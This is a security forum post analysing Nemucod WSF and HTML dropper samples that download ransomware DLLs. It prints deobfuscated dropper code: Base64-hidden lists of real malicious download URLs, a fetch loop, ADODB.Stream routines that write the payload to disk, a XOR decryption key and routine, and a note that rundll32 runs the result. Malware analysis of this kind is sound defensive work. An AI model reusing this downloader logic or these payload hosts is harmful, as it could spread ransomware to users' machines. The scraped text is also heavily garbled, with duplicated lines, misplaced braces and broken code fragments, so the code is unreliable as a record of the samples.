- May 14, 2016
- 1,597
3 files From : https://malwaretips.com/threads/31-8-16-6.62930/
Thanks to @Solarquest)
Sample 3 : csnLmN.wsf
Sample 4 : d13gTz.wsf
Sample 1 : qXKlF.html
5/55 Antivirus scan for 044510cf9b3c0ac7c60df3a8717ed9d0f150112168d97c1cdbe63839d49fbeed at 2016-08-31 13:12:22 UTC - VirusTotal
5/56 Antivirus scan for 8d1f122fcbe0da9a3b1081552398bdffd55670d4348fff31711ba81d61107788 at 2016-08-31 13:13:35 UTC - VirusTotal
=>Similar obfuscation Methods used in a previous sample I analyzed :
https://malwaretips.com/threads/824643807708-wsf-dropper-js_nemucod-smk2.62677/
Some changes but urls used are easily retrieved, by same method I used before
1) sample 3 & 4 : same URLS & Payload name(s) :
Looking at the end of the script
Explanations :
Names for the files downloaded :
URLs :
Payload : (3 names but exactly the same ransomware ) :
2 ) NEMUCOD part :
with some function that will be used to deobfuscate the downloaded file and make it a real .dll :
All usual, these functions are hidden in a var in a Base64 encoded string.
Result on spoiler part
The ciphered key used do do the XOR part, in red :
3) run :
4) Difference with other Nemucod samples :
To deobfuscate the payload, some functions we saw from last nemucod version (from other donwloader scripts) are not present (like in the same analysis of similar wsf droppers)
On latest version I have seen from other scripted downloader, the XOR part use :
5) For sample 1 similar : qXKlF.html
The only difference :
Thanks to @Solarquest)
Sample 3 : csnLmN.wsf
Sample 4 : d13gTz.wsf
Sample 1 : qXKlF.html
5/55 Antivirus scan for 044510cf9b3c0ac7c60df3a8717ed9d0f150112168d97c1cdbe63839d49fbeed at 2016-08-31 13:12:22 UTC - VirusTotal
5/56 Antivirus scan for 8d1f122fcbe0da9a3b1081552398bdffd55670d4348fff31711ba81d61107788 at 2016-08-31 13:13:35 UTC - VirusTotal
=>Similar obfuscation Methods used in a previous sample I analyzed :
https://malwaretips.com/threads/824643807708-wsf-dropper-js_nemucod-smk2.62677/
Some changes but urls used are easily retrieved, by same method I used before
1) sample 3 & 4 : same URLS & Payload name(s) :
Looking at the end of the script
var mahorkavodkatvarMASHEVHORDA17 = "sYCfiSIE;
var mahorkavodkatvarTRAxKey = mahorkavodkatvarMASHEVfsta("i4qGajo8QJA8VtuKNag3OyYhcnIEKcql");
for(mahorkavodkatvarMASHEVHORDA5 in mahorkavodkatvarMASHEV_a5){
var mahorkavodkatvarTRAxKey = mahorkavodkatvarMASHEVfsta("i4qGajo8QJA8VtuKNag3OyYhcnIEKcql");
var mahorkavodkatvarMASHEV_a5 =
[
var mahorkavodkatvarMASHEVHORDAI = 0;[
"d3POUNId3LnlhY2h0LW1hcmtldC5lPOUNIdS9qaEJIVFls",
"dPOUNI3d3LnBvbGktbWVjLml0L2poQkhUWWPOUNIw=",
"d3POUNId3LmVxdWlwZTQuPOUNIbmV0L2poQkhUWWw="
]; "dPOUNI3d3LnBvbGktbWVjLml0L2poQkhUWWPOUNIw=",
"d3POUNId3LmVxdWlwZTQuPOUNIbmV0L2poQkhUWWw="
for(mahorkavodkatvarMASHEVHORDA5 in mahorkavodkatvarMASHEV_a5){
mahorkavodkatvarMASHEVHORDAI++;
try{
}try{
var mahorkavodkatvarMASHEVHORDA6 = "http://"+mahorkavodkatvarMASHEV_a5[mahorkavodkatvarMASHEVHORDA5].mahorkavodkatvarDREAMTEAM() + "?mssGTlVi=KiqvaljO";
mahorkavodkatvarMASHEV_a2(mahorkavodkatvarMASHEVHORDA6,mahorkavodkatvarMASHEVHORDA17+mahorkavodkatvarMASHEVHORDAI);
}catch(mahorkavodkatvarMASHEVCEESZZAAA){}mahorkavodkatvarMASHEV_a2(mahorkavodkatvarMASHEVHORDA6,mahorkavodkatvarMASHEVHORDA17+mahorkavodkatvarMASHEVHORDAI);
Explanations :
Names for the files downloaded :
"sYCfiSIE" + index
=> sYCfiSIE1,
=> sYCfiSIE2
=> sYCfiSIE3
=> sYCfiSIE2
=> sYCfiSIE3
URLs :
A tab is easy to be found with these values :
"bGFuamFyb24uZXMubWlhbGlhcy5uZXQvamhCSFRZbA=POUNI=",
"aWZ0aWtoYXJjaGF1POUNIZGhyeS41MHdlYnMuY29tL2poQkhUWWw=",
"POUNIbW9qZWplemUucmVwdWJsaWthLnBsL2poQkhUWWw="
"aWZ0aWtoYXJjaGF1POUNIZGhyeS41MHdlYnMuY29tL2poQkhUWWw=",
"POUNIbW9qZWplemUucmVwdWJsaWthLnBsL2poQkhUWWw="
This is Base64 codes but with a part to obfuscate them a bit more.
Looking at their function which do the coding part:
Looking at their function which do the coding part:
.mahorkavodkatvarDREAMTEAM()
String.prototype.mahorkavodkatvarDREAMTEAM = function() {
String.prototype.mahorkavodkatvarDREAMTEAM = function() {
mahorkavodkatvarMASHEVXCOP = 0;
var mahorkavodkatvarMASHEVddDccC1, mahorkavodkatvarMASHEVddDccC2, mahorkavodkatvarMASHEVc3, mahorkavodkatvarMASHEVc4;
var mahorkavodkatvarMASHEVout = "";
var mahorkavodkatvarMASHEVpechenka= this["replace"](/POUNI/g, '');
var mahorkavodkatvarMASHEVlen = mahorkavodkatvarMASHEVsud(mahorkavodkatvarMASHEVpechenka);
...
... (Base64 decode stuff)
...
}var mahorkavodkatvarMASHEVddDccC1, mahorkavodkatvarMASHEVddDccC2, mahorkavodkatvarMASHEVc3, mahorkavodkatvarMASHEVc4;
var mahorkavodkatvarMASHEVout = "";
var mahorkavodkatvarMASHEVpechenka= this["replace"](/POUNI/g, '');
var mahorkavodkatvarMASHEVlen = mahorkavodkatvarMASHEVsud(mahorkavodkatvarMASHEVpechenka);
...
... (Base64 decode stuff)
...
this["replace"](/POUNI/g, ''); => All POUNI has to be removed from text passed in parameter, to become Base64 real codes
"bGFuamFyb24uZXMubWlhbGlhcy5uZXQvamhCSFRZbA=POUNI=",
"aWZ0aWtoYXJjaGF1POUNIZGhyeS41MHdlYnMuY29tL2poQkhUWWw="
"POUNIbW9qZWplemUucmVwdWJsaWthLnBsL2poQkhUWWw="
=> Base64 real codes :
"aWZ0aWtoYXJjaGF1
"
=> Base64 real codes :
"bGFuamFyb24uZXMubWlhbGlhcy5uZXQvamhCSFRZbA=="
"aWZ0aWtoYXJjaGF1ZGhyeS41MHdlYnMuY29tL2poQkhUWWw="
"bW9qZWplemUucmVwdWJsaWthLnBsL2poQkhUWWw="
"aWZ0aWtoYXJjaGF1ZGhyeS41MHdlYnMuY29tL2poQkhUWWw="
"bW9qZWplemUucmVwdWJsaWthLnBsL2poQkhUWWw="
With a Base64 decode tool :
=> URLs :
"http://" + "lanjaron.es.mialias.net/jhBHTYl", + "?UXRxPvxm=QKvTymv"
"http://" + "iftikharchaudhry.50webs.com/jhBHTYl", + "?UXRxPvxm=QKvTymv"
"http://" + "bW9qZWplemUucmVwdWJsaWthLnBsL2poQkhUWWw=" + "?UXRxPvxm=QKvTymv"
"http://" + "iftikharchaudhry.50webs.com/jhBHTYl", + "?UXRxPvxm=QKvTymv"
"http://" + "bW9qZWplemUucmVwdWJsaWthLnBsL2poQkhUWWw=" + "?UXRxPvxm=QKvTymv"
Payload : (3 names but exactly the same ransomware ) :
"http://" + "lanjaron.es.mialias.net/jhBHTYl?UXRxPvxm=QKvTymv"
=> sYCfiSIE1 => sYCfiSIE1.dll
"http://" + "iftikharchaudhry.50webs.com/jhBHTYl?UXRxPvxm=QKvTymv"
=> sYCfiSIE2 => sYCfiSIE2.dll
"http://" + "mojejeze.republika.pl/jhBHTYl?UXRxPvxm=QKvTymv"
=> sYCfiSIE3 => sYCfiSIE3.dll
.dll extensions are added when the deobfuscation of real files is a success
2 ) NEMUCOD part :
with some function that will be used to deobfuscate the downloaded file and make it a real .dll :
var mahorkavodkatvarMASHEVLUCIODOR = "CWZ1bmN0aW9uIG1haG9ya2F2b2RrYXR2YXJNQVNIRVZydGZ0YShmaWxlUGF0aCkNCnsNCiAgICB2YXIgbWFob3JrYXZvZGthdHZhcklTSEVWcm9zdGVrcz1XU2NyaXB0WyJDcmVhdGVPYmplY3QiXSgiQURPREIuU3RyZWFtIik7DQogICAgbWFob3JrYXZvZGthdHZhcklTSEVWcm9zdGVrc1s ..........................................
All usual, these functions are hidden in a var in a Base64 encoded string.
Result on spoiler part
function mahorkavodkatvarMASHEVrtfta(filePath)
{
function mahorkavodkatvarMASHEVfats(codeArray)
{
function mahorkavodkatvarMASHEVsatt(filePath, codeArray)
{
function mahorkavodkatvarMASHEVxdac(mahorkavodkatvarMASHEVcca)
{
};
{
var mahorkavodkatvarISHEVrosteks=WScript["CreateObject"]("ADODB.Stream");
mahorkavodkatvarISHEVrosteks["type"]=2;
mahorkavodkatvarISHEVrosteks["Charset"]=437;
mahorkavodkatvarISHEVrosteks["open"]();
mahorkavodkatvarISHEVrosteks["LoadFromFile"](filePath);
var fileString=mahorkavodkatvarISHEVrosteks["ReadText"];
mahorkavodkatvarISHEVrosteks["close"]();
return mahorkavodkatvarMASHEVfsta(fileString);
};mahorkavodkatvarISHEVrosteks["type"]=2;
mahorkavodkatvarISHEVrosteks["Charset"]=437;
mahorkavodkatvarISHEVrosteks["open"]();
mahorkavodkatvarISHEVrosteks["LoadFromFile"](filePath);
var fileString=mahorkavodkatvarISHEVrosteks["ReadText"];
mahorkavodkatvarISHEVrosteks["close"]();
return mahorkavodkatvarMASHEVfsta(fileString);
function mahorkavodkatvarMASHEVfats(codeArray)
{
var t2=new Array();
var t2=new Array();
t2[0x80]=0x00C7;t2[0x81]=0x00FC;t2[0x82]=0x00E9;t2[0x83]=0x00E2;t2[0x84]=0x00E4;t2[0x85]=0x00E0;t2[0x86]=0x00E5;t2[0x87]=0x00E7;t2[0x88]=0x00EA;t2[0x89]=0x00EB;t2[0x8A]=0x00E8;t2[0x8B]=0x00EF;t2[0x8C]=0x00EE;t2[0x8D]=0x00EC;t2[0x8E]=0x00C4;t2[0x8F]=0x00C5;t2[0x90]=0x00C9;t2[0x91]=0x00E6;t2[0x92]=0x00C6;t2[0x93]=0x00F4;t2[0x94]=0x00F6;t2[0x95]=0x00F2;t2[0x96]=0x00FB;t2[0x97]=0x00F9;t2[0x98]=0x00FF;t2[0x99]=0x00D6;t2[0x9A]=0x00DC;t2[0x9B]=0x00A2;t2[0x9C]=0x00A3;t2[0x9D]=0x00A5;t2[0x9E]=0x20A7;t2[0x9F]=0x0192;t2[0xA0]=0x00E1;t2[0xA1]=0x00ED;t2[0xA2]=0x00F3;t2[0xA3]=0x00FA;t2[0xA4]=0x00F1;t2[0xA5]=0x00D1;t2[0xA6]=0x00AA;t2[0xA7]=0x00BA;t2[0xA8]=0x00BF;t2[0xA9]=0x2310;t2[0xAA]=0x00AC;t2[0xAB]=0x00BD;t2[0xAC]=0x00BC;t2[0xAD]=0x00A1;t2[0xAE]=0x00AB;t2[0xAF]=0x00BB;t2[0xB0]=0x2591;t2[0xB1]=0x2592;t2[0xB2]=0x2593;t2[0xB3]=0x2502;t2[0xB4]=0x2524;t2[0xB5]=0x2561;t2[0xB6]=0x2562;t2[0xB7]=0x2556;t2[0xB8]=0x2555;t2[0xB9]=0x2563;t2[0xBA]=0x2551;t2[0xBB]=0x2557;t2[0xBC]=0x255D;t2[0xBD]=0x255C;t2[0xBE]=0x255B;t2[0xBF]=0x2510;t2[0xC0]=0x2514;t2[0xC1]=0x2534;t2[0xC2]=0x252C;t2[0xC3]=0x251C;t2[0xC4]=0x2500;t2[0xC5]=0x253C;t2[0xC6]=0x255E;t2[0xC7]=0x255F;t2[0xC8]=0x255A;t2[0xC9]=0x2554;t2[0xCA]=0x2569;t2[0xCB]=0x2566;t2[0xCC]=0x2560;t2[0xCD]=0x2550;t2[0xCE]=0x256C;t2[0xCF]=0x2567;t2[0xD0]=0x2568;t2[0xD1]=0x2564;t2[0xD2]=0x2565;t2[0xD3]=0x2559;t2[0xD4]=0x2558;t2[0xD5]=0x2552;t2[0xD6]=0x2553;t2[0xD7]=0x256B;t2[0xD8]=0x256A;t2[0xD9]=0x2518;t2[0xDA]=0x250C;t2[0xDB]=0x2588;t2[0xDC]=0x2584;t2[0xDD]=0x258C;t2[0xDE]=0x2590;t2[0xDF]=0x2580;t2[0xE0]=0x03B1;t2[0xE1]=0x00DF;t2[0xE2]=0x0393;t2[0xE3]=0x03C0;t2[0xE4]=0x03A3;t2[0xE5]=0x03C3;t2[0xE6]=0x00B5;t2[0xE7]=0x03C4;t2[0xE8]=0x03A6;t2[0xE9]=0x0398;t2[0xEA]=0x03A9;t2[0xEB]=0x03B4;t2[0xEC]=0x221E;t2[0xED]=0x03C6;t2[0xEE]=0x03B5;t2[0xEF]=0x2229;t2[0xF0]=0x2261;t2[0xF1]=0x00B1;t2[0xF2]=0x2265;t2[0xF3]=0x2264;t2[0xF4]=0x2320;t2[0xF5]=0x2321;t2[0xF6]=0x00F7;t2[0xF7]=0x2248;t2[0xF8]=0x00B0;t2[0xF9]=0x2219;t2[0xFA]=0x00B7;t2[0xFB]=0x221A;t2[0xFC]=0x207F;t2[0xFD]=0x00B2;t2[0xFE]=0x25A0;t2[0xFF]=0x00A0;
var EGj=new Array();
var resultString="";
var HIi3;
var OVc9;
for (var Tj=0; Tj < codeArray["length"]; Tj++)
{
else
{
resultString=EGj["join"]("");
return resultString;
};var t2=new Array();
t2[0x80]=0x00C7;t2[0x81]=0x00FC;t2[0x82]=0x00E9;t2[0x83]=0x00E2;t2[0x84]=0x00E4;t2[0x85]=0x00E0;t2[0x86]=0x00E5;t2[0x87]=0x00E7;t2[0x88]=0x00EA;t2[0x89]=0x00EB;t2[0x8A]=0x00E8;t2[0x8B]=0x00EF;t2[0x8C]=0x00EE;t2[0x8D]=0x00EC;t2[0x8E]=0x00C4;t2[0x8F]=0x00C5;t2[0x90]=0x00C9;t2[0x91]=0x00E6;t2[0x92]=0x00C6;t2[0x93]=0x00F4;t2[0x94]=0x00F6;t2[0x95]=0x00F2;t2[0x96]=0x00FB;t2[0x97]=0x00F9;t2[0x98]=0x00FF;t2[0x99]=0x00D6;t2[0x9A]=0x00DC;t2[0x9B]=0x00A2;t2[0x9C]=0x00A3;t2[0x9D]=0x00A5;t2[0x9E]=0x20A7;t2[0x9F]=0x0192;t2[0xA0]=0x00E1;t2[0xA1]=0x00ED;t2[0xA2]=0x00F3;t2[0xA3]=0x00FA;t2[0xA4]=0x00F1;t2[0xA5]=0x00D1;t2[0xA6]=0x00AA;t2[0xA7]=0x00BA;t2[0xA8]=0x00BF;t2[0xA9]=0x2310;t2[0xAA]=0x00AC;t2[0xAB]=0x00BD;t2[0xAC]=0x00BC;t2[0xAD]=0x00A1;t2[0xAE]=0x00AB;t2[0xAF]=0x00BB;t2[0xB0]=0x2591;t2[0xB1]=0x2592;t2[0xB2]=0x2593;t2[0xB3]=0x2502;t2[0xB4]=0x2524;t2[0xB5]=0x2561;t2[0xB6]=0x2562;t2[0xB7]=0x2556;t2[0xB8]=0x2555;t2[0xB9]=0x2563;t2[0xBA]=0x2551;t2[0xBB]=0x2557;t2[0xBC]=0x255D;t2[0xBD]=0x255C;t2[0xBE]=0x255B;t2[0xBF]=0x2510;t2[0xC0]=0x2514;t2[0xC1]=0x2534;t2[0xC2]=0x252C;t2[0xC3]=0x251C;t2[0xC4]=0x2500;t2[0xC5]=0x253C;t2[0xC6]=0x255E;t2[0xC7]=0x255F;t2[0xC8]=0x255A;t2[0xC9]=0x2554;t2[0xCA]=0x2569;t2[0xCB]=0x2566;t2[0xCC]=0x2560;t2[0xCD]=0x2550;t2[0xCE]=0x256C;t2[0xCF]=0x2567;t2[0xD0]=0x2568;t2[0xD1]=0x2564;t2[0xD2]=0x2565;t2[0xD3]=0x2559;t2[0xD4]=0x2558;t2[0xD5]=0x2552;t2[0xD6]=0x2553;t2[0xD7]=0x256B;t2[0xD8]=0x256A;t2[0xD9]=0x2518;t2[0xDA]=0x250C;t2[0xDB]=0x2588;t2[0xDC]=0x2584;t2[0xDD]=0x258C;t2[0xDE]=0x2590;t2[0xDF]=0x2580;t2[0xE0]=0x03B1;t2[0xE1]=0x00DF;t2[0xE2]=0x0393;t2[0xE3]=0x03C0;t2[0xE4]=0x03A3;t2[0xE5]=0x03C3;t2[0xE6]=0x00B5;t2[0xE7]=0x03C4;t2[0xE8]=0x03A6;t2[0xE9]=0x0398;t2[0xEA]=0x03A9;t2[0xEB]=0x03B4;t2[0xEC]=0x221E;t2[0xED]=0x03C6;t2[0xEE]=0x03B5;t2[0xEF]=0x2229;t2[0xF0]=0x2261;t2[0xF1]=0x00B1;t2[0xF2]=0x2265;t2[0xF3]=0x2264;t2[0xF4]=0x2320;t2[0xF5]=0x2321;t2[0xF6]=0x00F7;t2[0xF7]=0x2248;t2[0xF8]=0x00B0;t2[0xF9]=0x2219;t2[0xFA]=0x00B7;t2[0xFB]=0x221A;t2[0xFC]=0x207F;t2[0xFD]=0x00B2;t2[0xFE]=0x25A0;t2[0xFF]=0x00A0;
var EGj=new Array();
var resultString="";
var HIi3;
var OVc9;
for (var Tj=0; Tj < codeArray["length"]; Tj++)
{
HIi3=codeArray[Tj];
if (HIi3 < 128){OVc9=HIi3;
}else
{
OVc9=t2[HIi3];}
EGj.push(String["fromCharCode"](OVc9));
}EGj.push(String["fromCharCode"](OVc9));
resultString=EGj["join"]("");
return resultString;
function mahorkavodkatvarMASHEVsatt(filePath, codeArray)
{
var mahorkavodkatvarISHEVrosteks=WScript["CreateObject"]("ADODB.Stream");
mahorkavodkatvarISHEVrosteks["type"]=2;
mahorkavodkatvarISHEVrosteks["Charset"]=437;
mahorkavodkatvarISHEVrosteks["open"]();
mahorkavodkatvarISHEVrosteks["writeText"](mahorkavodkatvarMASHEVfats(codeArray));
mahorkavodkatvarISHEVrosteks["SaveToFile"](filePath, 2);
mahorkavodkatvarISHEVrosteks["close"]();
};mahorkavodkatvarISHEVrosteks["type"]=2;
mahorkavodkatvarISHEVrosteks["Charset"]=437;
mahorkavodkatvarISHEVrosteks["open"]();
mahorkavodkatvarISHEVrosteks["writeText"](mahorkavodkatvarMASHEVfats(codeArray));
mahorkavodkatvarISHEVrosteks["SaveToFile"](filePath, 2);
mahorkavodkatvarISHEVrosteks["close"]();
function mahorkavodkatvarMASHEVxdac(mahorkavodkatvarMASHEVcca)
{
for (var Tj=0; Tj < mahorkavodkatvarMASHEVcca["length"]; Tj++)
{
mahorkavodkatvarMASHEVcca[Tj] ^= mahorkavodkatvarTRAxKey[Math.floor(Tj % mahorkavodkatvarTRAxKey.length)];
}
return mahorkavodkatvarMASHEVcca;{
mahorkavodkatvarMASHEVcca[Tj] ^= mahorkavodkatvarTRAxKey[Math.floor(Tj % mahorkavodkatvarTRAxKey.length)];
}
};
var mahorkavodkatvarTRAxKey = mahorkavodkatvarMASHEVfsta("i4qGajo8QJA8VtuKNag3OyYhcnIEKcql");
It returns the real string where each chars will be used for the famous XOR part : ^=
(once each of this string chars has been used => it jumps to the first char and continues)
function xdac(content_file)
{
};
See previous analysis :
https://malwaretips.com/threads/824643807708-wsf-dropper-js_nemucod-smk2.62677/
It returns the real string where each chars will be used for the famous XOR part : ^=
(once each of this string chars has been used => it jumps to the first char and continues)
function xdac(content_file)
{
for (var index =0; i < content_file.length; index++)
{
content_file[index] ^= xKey[Math.floor(index % xKey.length)];
}
return content_file;{
content_file[index] ^= xKey[Math.floor(index % xKey.length)];
}
};
See previous analysis :
https://malwaretips.com/threads/824643807708-wsf-dropper-js_nemucod-smk2.62677/
3) run :
rundll32 is used, with the path file, and parameter for the dll : qwerty
4) Difference with other Nemucod samples :
To deobfuscate the payload, some functions we saw from last nemucod version (from other donwloader scripts) are not present (like in the same analysis of similar wsf droppers)
=> this is only for the XOR part, so easier in these scripts
On latest version I have seen from other scripted downloader, the XOR part use :
uheprng(){
var random = function(range) {
function rawprng(){
...
...
}...
var random = function(range) {
return Math.floor(range * (rawprng() + (rawprng() * 0x200000 | 0) * 1.1102230246251565e-16));
}function rawprng(){
...
...
}...
etc,...
5) For sample 1 similar : qXKlF.html
The only difference :
this.replace(/LUABUA/g, '');
eval(alkotesterzercerLOBIKLUCIODOR); => eval hidden part
var alkotesterzercerLOBIKHORDA17 = "EhFjFSNri"; => file when obfuscated
var alkotesterzercerTRAxKey = alkotesterzercerLOBIKfsta("OQX7NmUJ9OUmet5z24IaOwr0HoASBB7j");
Result : aKey deciphered used forXOR part
var alkotesterzercerLOBIK_a5 =
[
"d3d3Lml0b2dhemFpZLUABUAGFuLmpwL0hKZ2hqdDg3Mg==",
"Y29udmVuaWxpZLUABUAmVjYW5iZS53ZWIuZmMyLmNvbS9ISmdoanQ4NzI=",
"ZnJlZXVzZWQud2ViLmZjMi5jb20vSEpnaGp0ODcy"
];
Base64 decode :
URLS :eval(alkotesterzercerLOBIKLUCIODOR); => eval hidden part
var alkotesterzercerLOBIKHORDA17 = "EhFjFSNri"; => file when obfuscated
var alkotesterzercerTRAxKey = alkotesterzercerLOBIKfsta("OQX7NmUJ9OUmet5z24IaOwr0HoASBB7j");
Result : aKey deciphered used forXOR part
var alkotesterzercerLOBIK_a5 =
[
"d3d3Lml0b2dhemFpZ
"Y29udmVuaWxpZ
"ZnJlZXVzZWQud2ViLmZjMi5jb20vSEpnaGp0ODcy"
];
Base64 decode :
"http://" + "www .itogazaidan.jp/HJghjt872" + "?'MnKqQCLOB=aTDtnTWp"
"http://" + "convenilifecanbe.web.fc2.com/HJghjt872" + "?MnKqQCLOB=aTDtnTWp"
"http://" + "reeused.web.fc2.com/HJghjt872" + "?MnKqQCLOB=aTDtnTWp"
PAYLOAD :"http://" + "convenilifecanbe.web.fc2.com/HJghjt872" + "?MnKqQCLOB=aTDtnTWp"
"http://" + "reeused.web.fc2.com/HJghjt872" + "?MnKqQCLOB=aTDtnTWp"
EhFjFSNri1 => EhFjFSNri1.dll
EhFjFSNri3 => EhFjFSNri2.dll
EhFjFSNri3 => EhFjFSNri3.dll
EhFjFSNri3 => EhFjFSNri2.dll
EhFjFSNri3 => EhFjFSNri3.dll
Last edited: